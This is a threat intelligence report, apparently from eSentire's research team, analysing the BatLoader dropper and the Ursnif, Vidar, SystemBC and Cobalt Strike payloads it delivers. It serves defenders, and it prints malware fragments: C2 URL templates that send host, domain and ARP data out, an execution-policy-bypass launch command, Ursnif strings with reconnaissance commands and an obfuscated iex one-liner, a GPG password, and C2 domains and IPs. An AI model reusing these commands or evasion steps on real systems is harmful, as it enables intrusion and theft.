{
	"id": "9a7c73c8-183c-4561-948a-ccaf8a496560",
	"created_at": "2026-04-06T00:18:24.180768Z",
	"updated_at": "2026-04-10T13:11:49.907279Z",
	"deleted_at": null,
	"sha1_hash": "fae8f21f020f637b2c3bbc993334632d9a4f9936",
	"title": "eSentire Threat Intelligence Malware Analysis: BatLoader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6520751,
	"plain_text": "eSentire Threat Intelligence Malware Analysis: BatLoader\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 20:34:42 UTC\r\nSince being introduced in February 2022, BatLoader is a malware dropper that has been observed dropping several well-known malware or malicious tools like ISFB, SystemBC RAT, Redline Stealer, and Vidar Stealer. Since its MSI installer file\r\nsize is 100MB+, BatLoader can easily evade most sandboxes and antivirus tools.\r\nThis malware analysis delves deeper into the technical details of how the BatLoader malware operates and our security\r\nrecommendations to protect your organization from being exploited.\r\nKey Takeaways\r\nBatLoader delivers additional malware and tools including ISFB, Vidar Stealer, Cobalt Strike, Syncro RMM, and\r\nSystemBC RAT via fake installers.\r\neSentire Threat Response Unit (TRU) observed two different BatLoader campaigns in 2022.\r\nBatLoader can evade most antivirus detections due to the size of the MSI installers.\r\nThe loader drops certain malware if certain conditions of the infected host are met (e.g., ARP table, domain check).\r\nThe last BatLoader campaign performs the antivirus checks and is capable of modifying Windows UAC prompt,\r\ndisabling Windows Defender notifications, disabling Task Manager, disabling command prompt, preventing users\r\nfrom accessing Windows registry tools, disabling the Run command, and modifying the display timeout.\r\neSentire TRU assesses with high confidence that BatLoader will remain active in the wild in 2023 and potentially\r\nserve as a first stage payload to deliver other malware.\r\nCase Study BatLoader\r\nIn September 2022, eSentire TRU observed multiple BatLoader infections in Consumer Services, Retail,\r\nTelecommunications, and Non-Profit client environments. The initial infection starts with the user searching for installers\r\nsuch as Zoom, TeamViewer, AnyDesk, or FileZilla. The user navigates to the first advertisement displayed, which redirects\r\nthe user to the website hosting the fake installer. The MSI installers are signed by “Kancelaria Adwokacka Adwokat\r\nAleksandra Krzemińska” (Figures 1-2).\r\nFigure 1: Fake Zoom Installer\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 1 of 24\n\nFigure 2: Fake AnyDesk installer\r\nIn October and November 2022, we observed the second BatLoader campaign pushing fake installers such as TeamViewer\r\n(Figure 3), AnyDesk and LogMeIn. The infections were observed in Insurance, Consulting, Healthcare, and Printing\r\nindustries.\r\nFigure 3: Fake TeamViewer download page\r\nWe also observed several C2 domains related to BatLoader campaigns:\r\nupdatea1[.]com (first campaign)\r\ncloudupdatesss[.]com (first campaign)\r\nexternalchecksso[.]com (second campaign)\r\ninternalcheckssso[.]com (second campaign)\r\nBatLoader Analysis (First Campaign)\r\nBatLoader, named by Mandiant, is a malware dropper. The malware was first mentioned by Mandiant in February 2022. It’s\r\nworth noting that Mandiant mentioned the domain clouds222[.]com for the BatLoader campaign which also overlaps with\r\nthe Zloader C2 domain.\r\neSentire TRU observed BatLoader dropping the following malware / malicious tools:\r\nISFB\r\nSystemBC RAT\r\nRedline Stealer\r\nVidar Stealer\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 2 of 24\n\nFigure 4: BatLoader infection chain\r\nThe MSI installer file is over 100MB in size; the large file size is implemented by threat actor(s) to evade sandboxes and\r\nantivirus products. The properties of the BatLoader MSI installer are shown in Figure 5. Within the MSI file, we have found\r\nthe components of NovaPDF 11 (Figure 6) and other garbage files shown in Figure 7. The files reside within the\r\nC:\\Program Files (x86)\\Softland\\novaPDF 11\\Tools path that is created after the malicious MSI is successfully run, we also\r\nfound NordVPNSetup.exe dropped within the same path. We believe that the files mentioned are used as a decoy.\r\nFigure 5: Properties of the malicious MSI installer\r\nFigure 6: NovaPDF 11 components\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 3 of 24\n\nFigure 7: Decoy files\r\nThe main malicious trigger for the MSI installer resides under CustomAction table. Custom Actions are the operations\r\ndefined by the user during installation or MSI execution. The malicious actor(s) create a custom action to run the malicious\r\nPowerShell inline script. The malicious script resides under AI_DATA_SETTER action name and contains the instructions\r\nto download the malicious update.bat file from the C2 domain and place it under AppData\\Roaming folder (Figure 8). The\r\nPowerShell script is run via the PowerShell Core or pwsh.exe in a hidden window.\r\nFigure 8: Malicious PowerShell script under CustomAction Table\r\nThe downloaded update.bat file is responsible for downloading requestadmin.bat file and NirCmd.exe binary (Figure 9).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 4 of 24\n\nFigure 9: Contents of update.bat\r\nThe requestadmin.bat is responsible for performing antivirus tampering – adding %APPDATA% and %USERPROFILE%\\\r\npaths to Windows Defender exclusion to prevent Defender from scanning the mentioned paths. The batch file was executed\r\nvia nircmd.exe which was also downloaded from the C2; the utility allows the batch file to run in the background without\r\ndisplaying the user interface. Besides excluding the paths, the batch file also retrieves and executes the runanddelete.bat and\r\nscripttodo.ps1 scripts from the C2 via a native PowerShell command Invoke-WebRequest (Figure 10).\r\nFigure 10: The contents of requestadmin.bat\r\nThe scripttodo.ps1 installs the GnuPg, the software that encrypts and signs the data and communications as shown in Figure\r\n11.\r\nFigure 11: GnuPg installation\r\nFurther down, the script enumerates the current domain that the user is logged into, the username, and obtains all entries\r\nwithin the IPs starting with 192., 10., and .172 in the ARP cache table. Once it completes that task, it then checks the amount\r\nof IPs found in the ARP table and completes a sum operation.\r\nIf the amount is less than 2 and the user domain is within WORKGROUP, the script will not proceed to further\r\ninfection.\r\nIf the number of IPs is greater than 2, the domain is not in WORKGROUP and does not contain the username, which\r\nsatisfies all the conditions set in the script, then the full set of malware is retrieved from C2 (Figure 12).\r\nThe requests to the C2 server are performed in the following format:\r\nhttps://\u003cC2 Server\u003e/g5i0nq/index/d2ef590c0310838490561a205469713d/?servername=msi\u0026arp=\"+ $IP_count +\r\n\"\u0026domain=\" + $UserDomain + \"\u0026hostname=\" + $UserPCname\r\nhttps://\u003cC2 Server\u003e/g5i0nq/index/fa0a24aafe050500595b1df4153a17fb/?servername=msi\u0026arp=\"+ $IP_count +\r\n\"\u0026domain=\" + $UserDomain + \"\u0026hostname=\" + $UserPCname\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 5 of 24\n\nhttps://\u003cC2 Server\u003e/g5i0nq/index/i850c923db452d4556a2c46125e7b6f2/?servername=msi\u0026arp=\"+ $IP_count +\r\n\"\u0026domain=\" + $UserDomain + \"\u0026hostname=\" + $UserPCname\r\nhttps://\u003cC2 Server\u003e/g5i0nq/index/b5e6ec2584da24e2401f9bc14a08dedf/?servername=msi\u0026arp=\"+ $IP_count +\r\n\"\u0026domain=\" + $UserDomain + \"\u0026hostname=\" + $UserPCname\r\nFigure 12: Enumerating the host and retrieving malware from C2 based on the conditions\r\nIf the mentioned conditions are not satisfied, the script retrieves the GPG-encrypted files:\r\nd2ef5.exe.gpg (encrypted Ursnif)\r\np9d2s.exe.gpg (encrypted Vidar Stealer)\r\nIf all the conditions are met, the script retrieves the following files:\r\nd2ef5.exe.gpg (encrypted Ursnif)\r\np9d2s.exe.gpg (encrypted Vidar Stealer)\r\nd655.dll.gpg (encrypted Cobalt Strike)\r\nf827.exe.gpg (encrypted Syncro RMM)\r\nshutdowni.bat\r\nWe were unable to retrieve the shutdowni.bat file but we believe the script might have been deployed to restart the host.\r\nThe GPG decryption routine was borrowed from the script hosted on GitHub (Figure 13). The script looks for files ending\r\nwith gpg in %APPDATA% folder and decrypts them using the password 105b.\r\nFigure 13: GPG decryption snippet\r\nMoreover, the scripttodo.ps1 recursively removes the implementation of Windows Defender IOfficeAntiVirus under\r\nHKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}. The IOfficeAntivirus\r\ncomponent is responsible for detecting malicious or suspicious files downloaded from the Internet. It then adds the\r\nextensions such as exe and DLL as exclusions to Windows Defender. Additionally, the script downloads Nsudo.exe tool to\r\nbe able to run files and programs with full privileges.\r\nWe have mentioned that besides scripttodo.ps1, the runanddelete.bat (Figure 14) file was retrieved. The batch file is\r\nresponsible for running a malicious executable d2ef5.exe with administrator privileges by creating a VBS script\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 6 of 24\n\ngetadmin.vbs under %TEMP% folder to run the binary, but first the user would get an alert prompt from User Account\r\nControl (UAC) to allow the program to make changes.\r\nFigure 14: Contents of runanddelete.bat file\r\nThe Secrets of BatLoader\r\nThe binary d2ef5.exe is the ISFB banking malware also known as the successor of Gozi or Ursnif. The first Gozi variant was\r\nfirst discovered by SecureWorks in 2007 and is still active today, spreading through phishing emails and loaders. The Ursnif\r\nversion we observed can exfiltrate browser credentials and cookies, Thunderbird and Outlook profiles, POP3, SMTP\r\npasswords. The strings “*terminal* *wallet* *bank* *banco*” were also observed which suggests that Ursnif is also capable\r\nof stealing cryptocurrency from digital wallets and banking credentials.\r\nUpon execution, ISFB creates a persistence via Registry Run Keys under\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. The registry value VirtualStop (the registry\r\nvalues can be different based on the wordlist table hardcoded in the binary). The registry value contains the command that\r\nlaunches the shortcut (LNK) which contains powershell.exe in the relative path. The PowerShell starts the\r\nCollectMirrow.ps1 script under %USERPROFILE% folder bypassing the PowerShell’s execution policy.\r\nThe command execution example:\r\ncmd /c start C:\\Users\\\u003cusername\u003e\\VirtualStop.lnk -ep unrestricted -file C:\\Users\\\u003cusername\u003e\\CollectMirrow.ps1\r\nThe CollectMirror.ps1 script contains the PowerShell one-liner (Figure 15) that pulls the written data from the registry under\r\nHKEY_CURRENT_USER\\Software\\AppDataLow\\Software\\Microsoft\\\u003cregistry_value\u003e\u003e, specifically the TestMouse value\r\n(Figure 16).\r\nFigure 15: Contents of CollectMirror.ps1\r\nFigure 16: Contents of TestMouse registry value\r\nThe script performs process injection using the API such as OpenThread (to create a handle to an existing process),\r\nVirtualAlloc (memory allocation in the chosen process), and QueueUserAPC, the thread that the APC (Asynchronous\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 7 of 24\n\nProcedure Calls) is queued to has to enter an alertable state, this can be achieved by invoking SleepEx as shown in Figure\r\n17.\r\nWe have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB\r\n(MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5).\r\nFigure 17: Process injection\r\nWe have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB\r\n(MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5). You can read the very well-written analyses by Daniel Bunce here and here,\r\nbut we will cover the main basics of malware.\r\nThe payload locates the BSS section which is where the encrypted strings reside within the function shown in Figure 18 (the\r\nhex string 81 38 2E 62 73 73 contains ‘bss’).\r\nFigure 18: Payload locating the .bss section\r\nThe data stored in the BSS section is encoded as shown in Figure 19.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 8 of 24\n\nFigure 19: Snipped of the encoded data in the BSS section\r\nThe decryption function is shown below, the decryption function can be represented as the following pseudocode:\r\nFigure 20: Decryption function pseudocode\r\nThe decryption function takes 4 bytes of the encrypted data in BSS at a time and converts them into an integer, then\r\nsubtracts the key from the index value and adds to the DWORD value which is 4 bytes.\r\nThe decompiled code can be seen in Figure 21. The decryption function is thoroughly described by 0verfl0w (Daniel Bunce)\r\nhere. Part of the key is derived from the division operations from the value retrieved from API call\r\nGetSystemTimeAsFileTime (retrieving system time). Another part of the key is embedded in our payload which is\r\n0x81b8e7da. Applying the key to the decryption function (Figure 22) and part of the key derived from system time (which is\r\n19) gave us the decrypted data (Figure 23).\r\nFigure 21: Decompiled decryption function\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 9 of 24\n\nFigure 22: Decryption function in Python\r\nFigure 23: Decrypted strings\r\nThe second decompressed data blob contains the following:\r\nC2: trackingg-protectioon.cdn1.mozilla[.]net, 45.8.158[.]104, trackingg-protectioon.cdn1.mozilla[.]net, 188.127.224[.]114,\r\nweiqeqwns[.]com, wdeiqeqwns[.]com, weiqeqwens[.]com, weiqewqwns[.]com, iujdhsndjfks[.]com\r\nBotnet ID: 10101\r\nServer ID: 50\r\nKey: T3H5l6EZGEh6GkB5\r\nDirectory: /uploaded\r\nExtension: .dib, .pct (beacon extension)\r\nSleep time: 1 second\r\nConfigTimeout (time interval to check for a new configuration): 20 seconds\r\nThe third blob contains the wordlist values shown below:\r\n['list', 'stop', 'computer', 'desktop', 'system', 'service', 'start', 'game', 'stop', 'operation', 'black', 'line', 'white', 'mode', 'link', 'urls',\r\n'text', 'name', 'document', 'type', 'folder', 'mouse', 'file', 'paper', 'mark', 'check', 'mask', 'level', 'memory', 'chip', 'time', 'reply',\r\n'date', 'mirrow', 'settings', 'collect', 'options', 'value', 'manager', 'page', 'control', 'thread', 'operator', 'byte', 'char', 'return',\r\n'device', 'driver', 'tool', 'sheet', 'util', 'book', 'class', 'window', 'handler', 'pack', 'virtual', 'test', 'active', 'collision', 'process',\r\n'make', 'local', 'core']\r\nThese words are used to build the registry value names.\r\nAnother interesting feature of the ISFB is that it stores three embedded binaries within the unpacked payload. The binaries\r\nare compressed using APLib compression algorithm. The decompression function is shown in Figure 24.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 10 of 24\n\nFigure 24: APLib decompression function\r\nTo be able to locate the embedded compressed binaries, we need to find the structure of the ISFB payload where it stores the\r\nconfiguration. The configuration contains the payload marker or header, XOR key, CRC32 hash, the offset, and the size of\r\neach compressed binary (Figure 25). The payload marker defines the version of ISFB.\r\nFJ – old ISFB version\r\nJ1 – old ISFB version\r\nJ2 – DreamBot version\r\nJ3 – ISFB v3 Japan\r\nJJ – ISFB v2.14 and above\r\nWD – RM3\r\nFigure 25: Header section containing the configuration\r\nThe compressed data is separated by the null bytes as shown in Figure 26. You can see something resembling C2 domains in\r\nthe first blob.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 11 of 24\n\nFigure 26: Snippet of the compressed data\r\nWe wrote a Python script to extract the compressed data and decompress them (Figure 27). The first compressed blob\r\ncontains the RSA public key with the hash 0xe1285e64 (Figure 28).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 12 of 24\n\nFigure 27: Python script to extract and decompress data blobs\r\nFigure 28: RSA public key blob\r\nISFB also stores the configuration within the function that parses the payload header (Figure 29). The hash values are\r\ncalculated by XORing the value 0x69b25f44 (known as g_CsCookie from the leaked code) with the values that match with\r\nCRC_CLIENT32 (again, from the leaked code).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 13 of 24\n\nFigure 29: Snippet of the configuration hashes and payload header parsing\r\nThe following are the hashes of the payload as a result of XORing:\r\n0x11271c7f – timer\r\n0x48295783 – timer\r\n0x584e5925 – botnet\r\n0x556aed8f – server\r\n0x4fa8693e – key\r\n0xd0665bf6 – domains\r\n0x54432e74– directory\r\n0xbbb5c71d – extension\r\nThe traffic beaconing contains the following pattern that will be encrypted with the AES key extracted from the compressed\r\nblob:\r\nsoft=%u\u0026version=%u\u0026user==%08x%08x%08x%08x\r\n\u0026server=50\u0026id=10101\u0026crc=61f03b3\u0026uptime=102696\u0026action=%08x\u0026dns=%s\u0026whoami=%s\u0026os=%s\r\nsoft, version – version of the payload\r\nuser – the value calculated from applying the RNG (Random Number Generator) algorithm, using the username, computer\r\nname, XOR operations, and cpuid call.\r\nserver – server ID\r\nid – botnet ID\r\nuptime – is the value based on the API calls QueryPerformanceFrequency and QueryPerformanceCounter\r\ndns – computer name\r\nos – OS version and system type\r\nThe example of the encrypted with AES-128 beacon, replacing + with _2B and / with _2F, the / are also being added:\r\n/uploaded/V1jd62QM3JcPMZGTpdjl2I/mEcoduKcJlNZo/S1Tq0KYy/M2ZEZFPG3iasm8TVeZ5oYf7/m_2FHfl318/E2HneynLJsT2KcKW6/MBeMivC1\r\nSome interesting strings found:\r\n/data.php?version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026type=%u\u0026name=%s\r\n\\Software\\Microsoft\\Windows\\CurrentVersion\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\r\n%APPDATA%\\Mozilla\\Firefox\\Profiles\r\nEnableSPDY3_0\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 14 of 24\n\n\\Macromedia\\Flash Player\\\r\ncookies.sqlite\r\ncookies.sqlite-journal\r\nMozilla\\Firefox\\Profiles\r\nMicrosoft\\Edge\\User Data\\Default\r\nGoogle\\Chrome\\User Data\\Default\r\n--use-spdy=off --disable-http2\r\nCmd %s processed: %u\r\nCmd %u parsing: %u\r\ncmd /C \"%s\u003e %s1\"\r\nwmic computersystem get domain |more\r\nsysteminfo.exe\r\ntasklist.exe /SVC \u003e\r\ndriverquery.exe \u003e\r\nreg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s \u003e\r\ncmd /U /C \"type %s1 \u003e %s \u0026 del %s1\"\r\nnet view \u003e\r\nnslookup 127.0.0.1 \u003e\r\nnslookup myip.opendns.com resolver1.opendns.com\r\nnet config workstation \u003e\r\nnltest /domain_trusts \u003e\r\nnltest /domain_trusts /all_trusts \u003e\r\nnet view /all /domain \u003e\r\nnet view /all \u003e\r\nuser_pref(\"network.http.spdy.enabled\", false);\r\nSoftware\\Microsoft\\Windows Mail\r\nSoftware\\Microsoft\\Windows Live Mail\r\naccount{*}.oeaccount\r\nAccount_Name\r\nencryptedUsername\r\nSMTP_Email_Address\r\nencryptedPassword\r\nEmailAddressCollection/EmailAddress[%u]/Address\r\nSoftware\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\\r\nSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\\r\nAccount Name\r\nIMAP Server\r\nIMAP Password\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 15 of 24\n\nIMAP Use SSL\r\nPOP3 Server\r\nPOP3 Password\r\nPOP3 Use SSL\r\nSMTP Server\r\nSMTP Password\r\nSMTP Use SSL\r\n%PROGRAMFILES%\\Mozilla Thunderbird\r\n%USERPROFILE%\\AppData\\Roaming\\Thunderbird\\Profiles\\*.default\r\n\\logins.json\r\n/C pause dll\r\ncache2\\entries\\*.*\r\ncmd /c start %s -ep unrestricted -file %s\r\nnew-alias -name %s -value gp;new-alias -name %s -value iex;%s ([System.Text.Encoding]::ASCII.GetString((%s\r\n\"HKCU:\\%s\").%S))\r\nipconfig /all\r\nfile://c:\\test\\test32.dll\r\nfile://c:\\test\\tor64.dll\r\n30, 8, *terminal* *wallet* *bank* *banco*\r\nMan-in-the-browser is another capability of Ursnif. You might have noticed strings such as\r\n“user_pref(\"network.http.spdy.enabled\", false);”, “EnableSPDY3_0” and “--use-spdy=off --disable-http2”. Ursnif disables\r\nSPDY and HTTP/2 (successor of SPDY protocol) on the infected host. The protocols allow HTTP data compression to\r\nachieve minimal latency. With the protocol implementation, threat actor(s) might have to spend additional time attempting to\r\nmodify and intercepting the web traffic.\r\nWe still see some remanences from the Ursnif DreamBot in ISFB v2 (file://c:\\test\\tor64.dll), which might suggest that the\r\nTor communication capability is still possible.\r\nVidar Stealer, SystemBC, and Syncro RMM Agent\r\nBotnet: 1259\r\nVersion: 54.7\r\nC2: t[.]me/trampapanam, nerdculture[.]de/@yoxhyp\r\nUpon successful infection, first, the host would reach out to the C2 and retrieve the DLLs (Dynamic Link Library)\r\ndependencies such as vcruntime140.dll, sqlite3.dll, softokn3.dll, nss3.dll, msvcp140.dll, mozglue.dll, freebl3.dll for the\r\nstealer to be able to extract credentials and cookies from browsers and to function properly. If you are interesting in\r\nunderstanding in more depth what each library is responsible for, you can review our blog on Mars Stealer.\r\nThe stealer then collects the credentials, host information, files, and screenshot and sends it over as a ZIP archive in a\r\nbase64-encoded format as shown in Figure 30.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 16 of 24\n\nFigure 30: Vidar exfiltrating stolen data\r\nWe are in the processing of completing a technical analysis of Vidar Stealer, which will be our next blog.\r\nSyncro RMM is a Remote Monitoring and Management tool used to control and manage devices remotely. In the hands of a\r\nmalicious actor, this tool can be used as a persistence mechanism and remote accessing.\r\nSystemBC RAT also known as “socks5 backconnect system” (MD5: 8ea797eb1796df20d4bdcadf0264ad6c) is a malware\r\nthat leverages SOCKS5 proxies to hide malicious traffic, it also has the capability of sending additional payloads to the hosts\r\n(Figure 31).\r\nFigure 31: Leaked SystemBC on a hacking forum\r\nThe RAT creates the mutex “wow64” with the “start” as an argument (“start” will also be used as an argument for the\r\nscheduled task command). If the mutex is not present – the RAT will reach out to the C2. The C2 configuration is shown\r\nbelow:\r\nHOST1: 188.127.224.46\r\nHOST2: hgfiudtyukjnio[.]com\r\nPORT1: 4251\r\nTOR: 0\r\nIf the mutex is present on the host, the instruction would proceed further to check the integrity level of the current malicious\r\nprocess, then it compares to the value 1000 which is SECURITY_MANDATORY_LOW_RID (low integrity level, SID: S-1-16-0), this means the process is restricted and has limited write permissions.\r\nIf the value is not equal to 1000, it proceeds with scheduled task creation, the task name is “wow64.exe”. The\r\ncommand to run the scheduled task every 2 minutes is start.\r\nIf the value is equal to 1000, the RAT proceeds to communicate with the C2 (Figure 32).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 17 of 24\n\nFigure 32: Function responsible for calling C2, task scheduling, and mutex creation\r\nSystemBC is capable of executing scripts and commands retrieved from C2 such as ps1, bat, vbs, and exe (Figure 33).\r\nFigure 33: Scripts supported by SystemBC\r\nBatLoader Analysis (Second Campaign)\r\nThe second campaign we observed is slightly different than the first one. The MSI installer (MD5:\r\n099483061f8321e70ce86c9991385f48) with the signature “Tax In Cloud sp. z o.o.” does not come with an embedded\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 18 of 24\n\nPowerShell script. Instead, the installer pushes “avolkov.exe” binary to the infected machine and creates the registry key\r\ncontaining the path of the dropped binary which is AppData/Local/ SetupProject1 (Figure 34).\r\nFigure 34: Malicious MSI installer creating the registry key and dropping the binary file under\r\nAppData/Local/SetupProject1\r\nThe avolkov.exe binary (MD5: d41e0fee0ec6c2e3da56a6dcf53607da) utilizes libcurl 7.85.0 which enables the data transfer\r\nwith URL syntax for protocols such as HTTP/HTTPS, FTP, DICT, SMTP, IMAP, POP3, LDAP, acting as a potential\r\nbackdoor and loader. The binary has the C2 embedded inside the binary from where it retrieves the newtest.bat file (Figure\r\n35). The batch script is responsible for pulling additional BatLoader payloads and scripts from C2 such as:\r\nrequestadmin.bat\r\nnircmd.exe\r\nuser.ps1\r\ncheckav.ps1\r\nscripttodo.ps1\r\nFigure 35: Contents of newtest.bat\r\nThe requestadmin.bat (Figure 36) retrieved from the second campaign is different compared to the first campaign. The threat\r\nactor(s) made sure to add more paths and folders to Windows Defender exclusion including %TEMP% and C:\\Windows\\*\r\nas well as adding .ps1 (PowerShell) extension to the exclusion list.\r\nWe observed that the script retrieves NSudo and modifies Windows UAC prompt behavior by allowing administrators to\r\nperform operations without authentication or consent prompts:\r\nDisabling Windows Defender notifications,\r\nDisabling Task Manager,\r\nDisabling command prompt,\r\nPreventing users from accessing Windows registry tools,\r\nDisabling Run command,\r\nModifying the display timeout (monitor powers off after 30 minutes) and sleep mode (on AC/battery power – goes to\r\nsleep after 3000 minutes (50 hours)).\r\nThe script also no longer pulls runanddelete.bat file from the C2.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 19 of 24\n\nFigure 36: Contents of requestadmin.bat\r\nThe scripttodo.ps1 file still retrieves the same files from the C2, the Cobalt Strike payload (d655) was changed to a DLL\r\ninstead of EXE and shutdowni.bat is no longer pulled from the C2.\r\nuser.ps1 (Figure 37) is similar to scriptodo.ps1 in terms of enumerating the current domain of the host, username, and ARP\r\ntable.\r\nIf all conditions are satisfied and the host has SID S-1-5-32-544 present (Group Name: BUILTIN\\Administrators),\r\nthe script outputs “YES”.\r\nIf the conditions are not met and the host belongs to the workgroup, the script retrieves the Cobalt Strike payload\r\nnamed installv2.dll (MD5: 4a6898a4584fdfb34bbeefc77bc882c4) and runs it via rundll32.exe with an ordinal\r\n“SRANdomsrt”.\r\nInterestingly enough, we have observed QakBot using the same ordinal name to run Cobalt Strike payloads.\r\nFigure 37: Contents of the user.ps1\r\nAnother new addition to BatLoader is the antivirus check script (checkav.ps1). The script checks the host against the list of\r\nantiviruses and sends it out to C2 server (Figure 38).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 20 of 24\n\nFigure 38: Contents of checkav.ps1\r\nLater, threat actor(s) switched from externalchecksso[.]com to internalchecksso[.]com. The scripttodo.ps1 was also changed\r\nto ru.ps1 as well as the names for malicious binaries as shown in Figure 39.\r\nFigure 39: Contents of ru.ps1\r\nHow eSentire is Responding\r\nOur Threat Response Unit (TRU) combines threat intelligence obtained from continuous research and security incidents to\r\ncreate practical outcomes for our customers. We are taking a full-scale response approach to ongoing cybersecurity threats\r\nby deploying countermeasures, such as:\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 21 of 24\n\nImplementing threat detections and leveraging BlueSteel, our machine-learning powered PowerShell classifier, to\r\nidentify malicious command execution and ensuring that eSentire has visibility and detections are in place across\r\neSentire MDR for Endpoint and MDR for Network.\r\nPerforming global threat hunts for indicators associated with BatLoader.\r\nOur detection content is supported by investigation runbooks, ensuring our 24/7 SOC Cyber Analysts respond rapidly to any\r\nintrusion attempts related to known malware Tactics, Techniques, and Procedures. In addition, TRU closely monitors the\r\nthreat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.\r\nRecommendations from eSentire's Threat Response Unit (TRU)\r\nWe recommend implementing the following controls to help secure your organization against BatLoader malware:\r\nConfirm that all devices are protected with Endpoint Detection and Response (EDR) solutions\r\nEncouraging good cybersecurity hygiene among your users by using Phishing and Security Awareness Training\r\n(PSAT) when downloading software from the Internet.\r\nEncourage your employees to use password managers instead of using the password storage feature provided by web\r\nbrowsers.\r\nWhile the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical\r\nbusiness decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively\r\nmonitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs \u0026 network\r\ndata during active intrusions.\r\neSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat\r\nintelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to\r\nadvanced threats.\r\nIf you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your\r\nbusiness ahead of disruption.\r\nLearn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire\r\nSecurity Specialist.\r\nAppendix\r\nhttps://www.mandiant.com/resources/blog/seo-poisoning-batloader-atera\r\nhttps://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\r\nhttps://raw.githubusercontent.com/adbertram/Random-PowerShell-Work/master/Security/GnuPg.psm1\r\nhttps://learn.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls?redirectedfrom=MSDN\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/\r\nhttps://www.0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/\r\nhttps://www.0ffset.net/reverse-engineering/challenge-1-gozi-string-crypto/\r\nhttps://research.openanalysis.net/config/python/yara/isfb/rm3/gozi/2022/10/06/isfb.html\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer\r\nhttps://owasp.org/www-community/attacks/Man-in-the-browser_attack\r\nIndicators of Compromise\r\nName Indicators\r\nBatLoader C2 updatea1[.]com\r\nBatLoader C2 externalchecksso[.]com\r\nBatLoader C2 internalcheckssso[.]com\r\nUrsnif C2 weiqeqwns[.]com\r\nUrsnif C2 \u003e wdeiqeqwns[.]com\r\nUrsnif C2 weiqeqwens[.]com\r\nUrsnif C2 weiqewqwns[.]com\r\nUrsnif C2 iujdhsndjfks[.]com\r\nUrsnif C2 trackingg-protectioon.cdn1.mozilla[.]net\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 22 of 24\n\nUrsnif C2 45.8.158[.]104\r\nUrsnif C2 188.127.224[.]114\r\nUrsnif C2 siwdmfkshsgw[.]com\r\nVidar Stealer t[.]me/trampapanam\r\nUrsnif C2 Ijduwhsbvk[.]com\r\nVidar Stealer nerdculture[.]de/@yoxhyp\r\nSystemBC C2 hgfiudtyukjnio[.]com\r\nSystemBC C2(overlaps with Ursnif C2 ISP) 188.127.224[.]46\r\nCobalt Strike C2 139.60.161[.]74\r\nRedline C2 176.113.115[.]10\r\nMITRE ATT\u0026CK\r\nMITRE\r\nATT\u0026CK\r\nTactic\r\nID\r\nMITRE ATT\u0026CK\r\nTechnique\r\nDescription\r\nMITRE ATT\u0026CK\r\nTactic\r\nInitial 